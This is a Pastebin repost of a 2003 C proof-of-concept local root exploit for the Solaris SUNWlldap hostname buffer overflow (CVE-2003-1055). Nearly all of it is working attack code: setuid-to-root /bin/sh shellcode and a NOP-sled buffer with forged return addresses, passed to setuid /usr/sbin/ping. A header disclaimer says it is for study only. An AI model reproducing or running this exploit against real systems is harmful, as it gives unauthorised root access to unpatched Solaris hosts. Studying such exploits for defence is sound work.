Advertisement
FlyFar

Sun SUNWlldap Library Hostname - Local Buffer Overflow - CVE-2003-1055

Jan 22nd, 2024
1,113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.88 KB | Cybersecurity | 0 0
  1. /***********************************************************
  2. * hoagie_solarisldap.c
  3. *
  4. * gcc hoagie_solarisldap.c -o hoagie_solarisldap
  5. *
  6. * Author: Andi <andi@void.at>
  7. *
  8. * Greetz to Greuff, philipp and the other hoagie-fellas :-)
  9. *
  10. * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
  11. * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
  12. * DAMAGE DONE USING THIS PROGRAM.
  13. *
  14. *
  15. * Offsets: 9208 ... without patch 108994-11
  16. *
  17. ************************************************************/
  18.  
  19. #include <stdio.h>
  20.  
  21. #define NOP 0x90
  22. #define ORIGSIZE 258
  23.  
  24. char shellcode[]=
  25. /* main: */
  26. "\xeb\x0a" /* jmp initcall */
  27.  
  28. /* initlcall: */
  29. "\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */
  30. "\xc3" /* ret */
  31.  
  32. /* jmpz: */
  33. "\xeb\x05" /* jmp setuidcode */
  34.  
  35. /* initcall: */
  36. "\xe8\xf9\xff\xff\xff" /* call jmpz */
  37.  
  38. /* setuidcode: */
  39. "\x5e" /* popl %esi */
  40. "\x29\xc0" /* subl %eax, %eax */
  41. "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
  42. "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */
  43.  
  44. /* seteuid(0); */
  45. "\x50" /* pushl %eax */
  46. "\xb0\x8d" /* movb $0x8d, %al */
  47. "\xe8\xe0\xff\xff\xff" /* call initlcall */
  48. /* setuid(0); */
  49. "\x29\xc0" /* subl %eax, %eax */
  50. "\x50" /* pushl %eax */
  51. "\xb0\x17" /* movb $0x17, %al */
  52. "\xe8\xd6\xff\xff\xff" /* call initlcall */
  53.  
  54. "\xeb\x1f" /* jmp callz */
  55.  
  56. /* start: */
  57. /* execve /bin/sh */
  58. "\x5e" /* popl %esi */
  59. "\x8d\x1e" /* leal (%esi), %ebx */
  60. "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
  61. "\x29\xc0" /* subl %eax, %eax */
  62. "\x88\x46\x19" /* movb %al, 0x19(%esi) */
  63. "\x89\x46\x14" /* movl %eax, 0x14(%esi) */
  64. "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
  65. "\x89\x46\x07" /* movl %eax, 0x07(%esi) */
  66. "\xb0\x3b" /* movb $0x3b, %al */
  67. "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
  68. "\x51" /* pushl %ecx */
  69. "\x51" /* pushl %ecx */
  70. "\x53" /* pushl %ebx */
  71. "\x50" /* pushl %eax */
  72. "\xeb\x18" /* jmp lcall */
  73.  
  74. /* callz: */
  75. "\xe8\xdc\xff\xff\xff" /* call start */
  76.  
  77. "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
  78. "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
  79.  
  80. /* lcall: */
  81. "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */
  82.  
  83.  
  84.  
  85. unsigned long getsp(void)
  86. {
  87. __asm__(" movl %esp,%eax ");
  88. }
  89.  
  90. int main(int argc, char **argv) {
  91. char buf[512];
  92. int offset = 9208;
  93. int retaddr = 0;
  94. int i;
  95.  
  96. if (argc > 1) {
  97. sscanf(argv[1], "%d", &offset);
  98. }
  99.  
  100. printf("hoagie_solarisldap local root exploit\n");
  101. printf("[*] offset: 0x%x\n", offset);
  102.  
  103. memset(buf, NOP, sizeof(buf));
  104. buf[28] = 0xeb;
  105. buf[29] = 30;
  106. for (i = 0; i < strlen(shellcode); i++) {
  107. buf[i + 60] = shellcode[i];
  108. }
  109.  
  110. retaddr = getsp() - offset;
  111. printf("[*] return address: 0x%x\n", retaddr);
  112.  
  113. for (i = 0; i < 4 * 25; i += 4){
  114. buf[i + ORIGSIZE + 2] = retaddr & 0xff;
  115. buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff;
  116. buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff;
  117. buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff;
  118. }
  119.  
  120. execl("/usr/sbin/ping", "ping", buf, NULL);
  121. }
  122.  
  123.  
  124. // milw0rm.com [2003-04-01]
  125.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement